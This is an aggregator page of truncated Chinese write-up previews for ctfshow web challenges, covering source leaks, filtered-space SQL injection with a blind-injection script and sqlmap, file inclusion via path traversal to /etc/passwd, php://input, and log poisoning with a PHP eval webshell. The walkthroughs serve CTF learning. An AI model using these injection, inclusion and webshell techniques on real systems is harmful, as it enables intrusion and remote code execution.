ctfshow—web—web7】的更多相关文章

打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'table=""for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "asc…
web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问robots.txt后得到后台地址,访问得到flag web5 题目:phps源码泄露 访问index.phps下载源码拿到flag web6 题目:解压源码到当前目录,测试正常,收工 访问www.zip…
打开靶机 发现登录窗,首先想到SQL注入 抓包,进行SQL注入测试 测试发现空格符被过滤了 使用/**/代替空格符进行绕过,绕过后登录成功 检测回显位 开始查询数据库名 开始查询数据库内数据表名称 查询表内字段名 查询字段信息 成功拿到flag…
打开靶机,代码审计 附上代码 <?php error_reporting(0); ?> <html lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=devic…
打开靶机 发现与web3很相似,测试文件包含未成功 此题有两种解决方法 一.日志注入 查看日志的默认目录,得到了日志文件 ?url=/var/log/nginx/access.log 进行日志注入 <?php @eval($_POST['a']);?> 这里需要把一句话木马加在参数里面 用蚁剑进行连接测试 连接成功,在www目录下发现flag.txt文件 查看flag.txt文件内容 成功拿到flag 二.远程文件包含 重新开启一个靶机环境 在购买的阿里云服务器中编写一句话木马(阿里云服务器已…
打开靶机 提示是文件包含漏洞 测试成功 https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd 此题考的是PHP伪协议+文件包含,实现任意命令执行 抓取数据包 https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input 开始试验,查询当前目录下的文件…
打开靶机,根据提示是SQL注入 打开后看到登录窗口 方法一.手工注入 抓取数据包 开始SQL注入测试 利用万能密码,登录成功 查看回显位置 查询数据库 查询数据库内数据表 如果想整齐一点显示可以添加group_concat() 查询字段 查询字段内容 成功拿到flag 方法二.sqlmap注入 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlma…
打开靶机,发现只有一句话 查看源码 发现一段字符串,猜是base64加密 拿到flag…
无字母数字webshell 预备知识 一些不包含数字和字母的webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 无字母数字webshell之提高篇 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 第一篇文章主要介绍通过取反.异或.递增,p神讲的很清楚了. 题目 <?php if(is…
0x00前记 ​ 终于把学校上学期的期末考试考完了,刚好复习的时候跟着群里的师傅写了ctfshow上Web入门的42-54的题目,其中有很多的坑,但是收获也是很多的,这里做一下总结吧!给自己挖了很多的坑,很感谢各位师傅帮我填坑!!! 0x01命令执行 ​ 题目的考点主要都是命令执行+命令分隔,与ping的那种题目类似,不过这里主要是使用是">/dev/null 2>&1",百度查了一下意思,好像是不进行回显的意思,那就分隔命令,将命令分开,使得后面的命令失去相应的作…